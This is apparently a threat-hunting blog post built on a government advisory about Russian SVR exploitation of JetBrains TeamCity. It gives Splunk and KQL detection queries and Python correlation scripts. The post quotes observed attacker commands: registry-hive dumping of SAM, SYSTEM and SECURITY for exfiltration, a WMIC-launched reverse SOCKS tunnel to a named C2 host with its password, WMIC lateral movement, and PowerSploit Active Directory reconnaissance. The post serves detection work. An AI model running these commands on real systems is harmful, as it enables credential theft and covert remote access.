Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally
Behavior Patterns
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to-detect command and control (C2) infrastructure.
This playbook is based on CISA Alert AA23-347A and contains the corresponding Sigma rules for threat hunting. It additionally contains a threat-hunting Sigma rule for living-off-the-land and exploitation commands against Active Directory, and one for detecting EDRSandBlast, which the SVR also uses in some cases.
Host Reconnaissance
whoami
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
Privilege information listing via whoami
Splunk:
index=* source="WinEventLog:*" AND ((Image="*whoami.exe") AND (CommandLine="*priv*" OR CommandLine="*Priv*"))
Sigma rule: Sigma-Rules/Whoami.exe Russian SVR JetBrains.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where ((FolderPath endswith @'\whoami.exe' or InitiatingProcessVersionInfoOriginalFileName =~ @'whoami.exe' or ProcessVersionInfoOriginalFileName =~ @'whoami.exe') and (ProcessCommandLine contains @' /priv' or ProcessCommandLine contains @' /all' or ProcessCommandLine contains @' /groups' or ProcessCommandLine contains @' /domain'))
DC listing via nltest
nltest -dclist
nltest -dsgetd
Sigma rule: Sigma-Rules/DC listing via nltest.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @'nltest.exe' and (ProcessCommandLine matches regex @'(?i).*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'))
DLL execution via WMI
Sigma rule: Sigma-Rules/DLL execution via WMI.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @'WMIC.exe' and (ProcessCommandLine contains @'call' or ProcessCommandLine contains @'rundll32'))
Splunk:
index=* source="WinEventLog:*" AND ((Image="*WMIC.exe") AND (CommandLine="*call*" OR CommandLine="*rundll32*"))
Process with connect and pass as args
MDE KQL:
DeviceProcessEvents | where (ProcessCommandLine contains @'pass' and ProcessCommandLine contains @'connect')
Splunk:
index=* source="WinEventLog:*" AND ((CommandLine="*pass*") AND (CommandLine="*connect*"))
Service or driver enumeration via PowerShell
MDE KQL:
DeviceEvents | where ActionType == "PowerShellCommand" | where (((AdditionalFields contains @'Get-WmiObject' or InitiatingProcessCommandLine contains @'Get-WmiObject') and (AdditionalFields contains @'-Class' or InitiatingProcessCommandLine contains @'-Class') and (AdditionalFields contains @'Win32_Service' or InitiatingProcessCommandLine contains @'Win32_Service')) or ((AdditionalFields contains @'Get-WindowsDriver' or InitiatingProcessCommandLine contains @'Get-WindowsDriver') and (AdditionalFields contains @'-Online' or InitiatingProcessCommandLine contains @'-Online') and (AdditionalFields contains @'-All' or InitiatingProcessCommandLine contains @'-All')))
Splunk:
index=* source="WinEventLog:*" AND (((ScriptBlockText="*Get-WmiObject*") AND (ScriptBlockText="*-Class*") AND (ScriptBlockText="*Win32_Service*")) OR ((ScriptBlockText="*Get-WindowsDriver*") AND (ScriptBlockText="*-Online*") AND (ScriptBlockText="*-All*")))
DLL names used by SVR for GraphicalProton backdoor
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator. After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files — with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.
MDE KQL:
DeviceImageLoadEvents | where (FolderPath endswith @'AclNumsInvertHost.dll' or FolderPath endswith @'ModeBitmapNumericAnimate.dll' or FolderPath endswith @'UnregisterAncestorAppendAuto.dll' or FolderPath endswith @'DeregisterSeekUsers.dll' or FolderPath endswith @'ScrollbarHandleGet.dll' or FolderPath endswith @'PerformanceCaptionApi.dll' or FolderPath endswith @'WowIcmpRemoveReg.dll' or FolderPath endswith @'BlendMonitorStringBuild.dll' or FolderPath endswith @'HandleFrequencyAll.dll' or FolderPath endswith @'HardSwapColor.dll' or FolderPath endswith @'LengthInMemoryActivate.dll' or FolderPath endswith @'ParametersNamesPopup.dll' or FolderPath endswith @'ModeFolderSignMove.dll' or FolderPath endswith @'ChildPaletteConnected.dll' or FolderPath endswith @'AddressResourcesSpec.dll')
Splunk:
index=* source="WinEventLog:*" AND (ImageLoaded="*AclNumsInvertHost.dll" OR ImageLoaded="*ModeBitmapNumericAnimate.dll" OR ImageLoaded="*UnregisterAncestorAppendAuto.dll" OR ImageLoaded="*DeregisterSeekUsers.dll" OR ImageLoaded="*ScrollbarHandleGet.dll" OR ImageLoaded="*PerformanceCaptionApi.dll" OR ImageLoaded="*WowIcmpRemoveReg.dll" OR ImageLoaded="*BlendMonitorStringBuild.dll" OR ImageLoaded="*HandleFrequencyAll.dll" OR ImageLoaded="*HardSwapColor.dll" OR ImageLoaded="*LengthInMemoryActivate.dll" OR ImageLoaded="*ParametersNamesPopup.dll" OR ImageLoaded="*ModeFolderSignMove.dll" OR ImageLoaded="*ChildPaletteConnected.dll" OR ImageLoaded="*AddressResourcesSpec.dll")
Sensitive registry entries saved to file
In order to exfiltrate the Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. It used "reg save" to save the SYSTEM, SAM and SECURITY registry hives, and used PowerShell to stage .zip archives in the C:\Windows\Temp\ directory:
reg save HKLM\SYSTEM "C:\Windows\temp\1\sy.sa" /y
reg save HKLM\SAM "C:\Windows\temp\1\sam.sa" /y
reg save HKLM\SECURITY "C:\Windows\temp\1\se.sa" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @'reg.exe' and ProcessCommandLine contains @'save' and (ProcessCommandLine matches regex @'(?i).*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*') and (ProcessCommandLine matches regex @'(?i).*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'))
Compressing files from temp to temp
MDE KQL:
DeviceEvents | where ActionType == "PowerShellCommand" | where ((AdditionalFields matches regex @'(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*') or (InitiatingProcessCommandLine matches regex @'(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'))
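The two rules above fire independently; the sequence the advisory describes (hive dumps, then an archive staged from C:\Windows\temp\<n> back into temp on the same host) is a much stronger signal when correlated. This is an added example, not code from the original post or from the Sigma-Rules repository; the events, hostnames and timestamps are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Mirrors the reg save (SYSTEM/SAM/SECURITY) and Compress-Archive temp-to-temp
# rules above, then correlates both on one host inside a short time window.
HIVE_SAVE = re.compile(r"reg(?:\.exe)?\s+save\s+HKLM\\(SYSTEM|SAM|SECURITY)\b", re.I)
STAGE_ZIP = re.compile(
    r"Compress-Archive.*-Path\s+\S*Windows\\temp\\[1-9]\b.*-DestinationPath\s+\S*Windows\\temp\\",
    re.I,
)
WINDOW = timedelta(minutes=10)  # assumed correlation window

def classify(cmdline):
    """Return the rule name a single command line triggers, or None."""
    m = HIVE_SAVE.search(cmdline)
    if m:
        return "reg_save_" + m.group(1).upper()
    if STAGE_ZIP.search(cmdline):
        return "compress_temp_to_temp"
    return None

def correlate(events):
    """events: iterable of (timestamp, host, cmdline). Returns {host: alert}
    for hosts where a hive dump was followed within WINDOW by a staged archive."""
    by_host = defaultdict(list)
    for ts, host, cmd in sorted(events):
        rule = classify(cmd)
        if rule:
            by_host[host].append((ts, rule))
    alerts = {}
    for host, hits in by_host.items():
        hives = [(ts, r) for ts, r in hits if r.startswith("reg_save_")]
        zips = [ts for ts, r in hits if r == "compress_temp_to_temp"]
        for zts in zips:
            dumped = sorted({r[len("reg_save_"):] for ts, r in hives if zts - WINDOW <= ts <= zts})
            if dumped:
                alerts[host] = {"hives": dumped, "staged_at": zts}
    return alerts

# Constructed sample telemetry (not real data): one staging sequence, one benign host.
SAMPLE_EVENTS = [
    (datetime(2023, 12, 1, 9, 0, 5), "build01", r'reg save HKLM\SYSTEM "C:\Windows\temp\1\sy.sa" /y'),
    (datetime(2023, 12, 1, 9, 0, 6), "build01", r'reg save HKLM\SAM "C:\Windows\temp\1\sam.sa" /y'),
    (datetime(2023, 12, 1, 9, 0, 7), "build01", r'reg save HKLM\SECURITY "C:\Windows\temp\1\se.sa" /y'),
    (datetime(2023, 12, 1, 9, 2, 0), "build01", r"powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force"),
    (datetime(2023, 12, 1, 9, 0, 0), "ws07", r"reg save HKLM\SOFTWARE C:\backup\sw.hiv /y"),
    (datetime(2023, 12, 1, 9, 1, 0), "ws07", r"powershell Compress-Archive -Path C:\Users\a\docs -DestinationPath C:\Windows\temp\d.zip"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

A benign SOFTWARE hive export or an archive built from a user directory does not trip the correlation, so the combined alert is worth a higher severity than either rule alone.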
Scheduled tasks names used by SVR for Graphical backdoor
Splunk:
index=* source="WinEventLog:*" AND ((EventCode="4698" OR EventCode="4699" OR EventCode="4702") AND (TaskName="\\Microsoft\\Windows\\IISUpdateService" OR TaskName="\\Microsoft\\Windows\\WindowsDefenderService" OR TaskName="\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName="\\Microsoft\\DefenderService" OR TaskName="\\Microsoft\\Windows\\DefenderUPDService" OR TaskName="\\Microsoft\\Windows\\WiMSDFS" OR TaskName="\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck" OR TaskName="\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting" OR TaskName="\\Microsoft\\Windows\\Windows Defender\\Defender Update Service" OR TaskName="\\WindowUpdate" OR TaskName="\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting" OR TaskName="\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck" OR TaskName="\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask" OR TaskName="\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart" OR TaskName="\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update" OR TaskName="\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck" OR TaskName="\\Microsoft\\Windows\\ATPUpd" OR TaskName="\\Microsoft\\Windows\\Windows Defender\\Service Update" OR TaskName="\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check" OR TaskName="\\Defender" OR TaskName="\\defender"))
MDE KQL:
DeviceProcessEvents | where ((FolderPath endswith @'schtasks.exe' and (ProcessCommandLine contains @'IISUpdateService' or ProcessCommandLine contains @'WindowsDefenderService' or ProcessCommandLine contains @'WindowsDefenderService2' or ProcessCommandLine contains @'DefenderService' or ProcessCommandLine contains @'DefenderUPDService' or ProcessCommandLine contains @'WiMSDFS' or ProcessCommandLine contains @'StartupAppTaskCkeck' or ProcessCommandLine contains @'SubmitReporting' or ProcessCommandLine contains @'Defender Update Service' or ProcessCommandLine contains @'WindowUpdate' or ProcessCommandLine contains @'CheckReporting' or ProcessCommandLine contains @'StartupAppTaskCheck' or ProcessCommandLine contains @'SpeechModelInstallTask' or ProcessCommandLine contains @'BfeOnServiceStart' or ProcessCommandLine contains @'Data Integrity Update' or ProcessCommandLine contains @'Scheduled AutoCheck' or ProcessCommandLine contains @'ATPUpd' or ProcessCommandLine contains @'Service Update' or ProcessCommandLine contains @'Scheduled Check' or ProcessCommandLine contains @'Defender' or ProcessCommandLine contains @'defender')) or (FolderPath endswith @'schtasks.exe' and ((ProcessCommandLine matches regex @'(?i).*Defender\sUpdate\sService.*') or (ProcessCommandLine matches regex @'(?i).*Data\sIntegrity\sUpdate.*') or (ProcessCommandLine matches regex @'(?i).*Scheduled\sAutoCheck.*') or (ProcessCommandLine matches regex @'(?i).*Service\sUpdate.*') or (ProcessCommandLine matches regex @'(?i).*Scheduled\sCheck.*'))))
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001]. This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068].
MDE KQL:
DeviceFileEvents | where (InitiatingProcessFolderPath endswith @'WNBIOS.sys' or InitiatingProcessFolderPath endswith @'ntkrnlmp.pdb' or InitiatingProcessFolderPath endswith @'GDRV.sys' or InitiatingProcessFolderPath endswith @'RTCore64.sys' or InitiatingProcessFolderPath endswith @'DBUtil_2_3.sys')
Splunk:
index=* source="WinEventLog:*" AND (Image="*WNBIOS.sys" OR Image="*ntkrnlmp.pdb" OR Image="*GDRV.sys" OR Image="*RTCore64.sys" OR Image="*DBUtil_2_3.sys")
Further Recon Hunting and Red Teaming Opportunities
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Living Off The Land and Exploitation Active Directory

Commands like the ones above are used by threat actors to gather further information about Active Directory in order to move laterally. Further commands can be found in the LOLAD project.
The LOLAD and Exploitation project provides a comprehensive collection of Active Directory techniques, commands, and functions that can be used natively to support offensive security operations and Red Team exercises. These techniques leverage AD’s built-in tools to conduct reconnaissance, privilege escalation, and lateral movement, among other tactics. Understanding these methods helps defenders strengthen AD configurations and improve monitoring capabilities.
I’ve written for all commands a Sigma Rule for threat hunting.
MDE KQL:
DeviceProcessEvents | where (((FolderPath endswith @'\powershell.exe' or FolderPath endswith @'\pwsh.exe' or FolderPath endswith @'\powershell_ise.exe') or ProcessVersionInfoOriginalFileName in~ (@'PowerShell.EXE', @'pwsh.dll')) and (ProcessCommandLine contains @'Get-AD ' or ProcessCommandLine contains @'Get-GPO' or ProcessCommandLine contains @'Search-ADAccount' or ProcessCommandLine contains @'Get-NetGroup' or ProcessCommandLine contains @'Get-NetDomain' or ProcessCommandLine contains @'Get-NetDomainTrust' or ProcessCommandLine contains @'Get-LocalGroupMember' or ProcessCommandLine contains @'Get-NetUser' or ProcessCommandLine contains @'Get-DomainPolicy' or ProcessCommandLine contains @'Get-NetSession' or ProcessCommandLine contains @'Get-DnsServer' or ProcessCommandLine contains @'Get-ADReplicationSubnet' or ProcessCommandLine contains @'Get-EventLog' or ProcessCommandLine contains @'Clear-EventLog' or ProcessCommandLine contains @'Backup-GPO'))
Splunk:
index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" AND (((NewProcessName="*\\powershell.exe" OR NewProcessName="*\\pwsh.exe" OR NewProcessName="*\\powershell_ise.exe") OR (OriginalFileName="PowerShell.EXE" OR OriginalFileName="pwsh.dll")) AND (CommandLine="*Get-AD *" OR CommandLine="*Get-GPO*" OR CommandLine="*Search-ADAccount*" OR CommandLine="*Get-NetGroup*" OR CommandLine="*Get-NetDomain*" OR CommandLine="*Get-NetDomainTrust*" OR CommandLine="*Get-LocalGroupMember*" OR CommandLine="*Get-NetUser*" OR CommandLine="*Get-DomainPolicy*" OR CommandLine="*Get-NetSession*" OR CommandLine="*Get-DnsServer*" OR CommandLine="*Get-ADReplicationSubnet*" OR CommandLine="*Get-EventLog*" OR CommandLine="*Clear-EventLog*" OR CommandLine="*Backup-GPO*"))
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named "rr.exe" — a modified open source reverse SOCKS tunneler named Rsockstun — to establish a tunnel to the C2 infrastructure [T1572]. The authoring agencies are aware of the following infrastructure used in conjunction with "rr.exe":
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Lateral Movement
The SVR used WMIC to facilitate lateral movement [T1047], [T1210].
wmic /node:"" /user:"" /password:"" process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
The SVR also modified the DisableRestrictedAdmin key to enable remote connections [T1210]. It modified the Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
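The three command lines in the tunneling and lateral-movement sections share structure that a hunt can parse rather than just substring-match: the "-connect/-pass" argument pair, WMIC "process call create" with a rundll32 DLL and an optional /node target, and a reg add that sets DisableRestrictedAdmin to 0. The following is an added example, not code from the original post or the Sigma-Rules repository; the sample command lines, hostnames and the password placeholder are constructed.

```python
import re

# Parsers for the command-line patterns discussed above. Each returns structured
# findings so an analyst can pivot on the C2 host, the DLL name or the /node target.
CONNECT_PASS = re.compile(r"-connect\s+(\S+).*?-pass\s+(\S+)", re.I)
WMIC_CREATE = re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I)
RUNDLL = re.compile(r"rundll32(?:\.exe)?\s+(\S+\.dll)(?:[\s,]+([^\s\"]+))?", re.I)
RESTRICTED_ADMIN = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\S*\\Control\\Lsa\b.*?/v\s+DisableRestrictedAdmin\b.*?/d\s+\"?0\"?",
    re.I,
)

def inspect(cmdline):
    """Return a list of findings (dicts) for one process command line."""
    findings = []
    m = CONNECT_PASS.search(cmdline)
    if m:  # reverse SOCKS tunneler style arguments; the password itself is not recorded
        findings.append({"rule": "reverse_socks_connect_pass", "c2": m.group(1).lower()})
    if WMIC_CREATE.search(cmdline):
        f = {"rule": "wmic_process_call_create"}
        r = RUNDLL.search(cmdline)
        if r:
            f["dll"] = r.group(1).rsplit("\\", 1)[-1]  # basename of the loaded DLL
            f["export"] = r.group(2)                   # exported function, if given
        node = re.search(r"/node:(\S+)", cmdline, re.I)
        if node:
            f["remote"] = node.group(1).strip('"')     # lateral movement target
        findings.append(f)
    if RESTRICTED_ADMIN.search(cmdline):  # only the value 0 (Restricted Admin disabled) is flagged
        findings.append({"rule": "disable_restricted_admin_set_0"})
    return findings

# Constructed sample command lines (placeholders, not real infrastructure or credentials).
SAMPLE_CMDLINES = [
    r'wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass EXAMPLEPASS"',
    r'wmic /node:"10.0.0.5" /user:"CORP\svc" /password:"x" process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"',
    r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f',
    r"rundll32.exe shell32.dll,Control_RunDLL",  # benign: no WMIC wrapper
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f",  # benign: value 1
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(inspect(c))
```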
Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally was originally published in Detect FYI on Medium.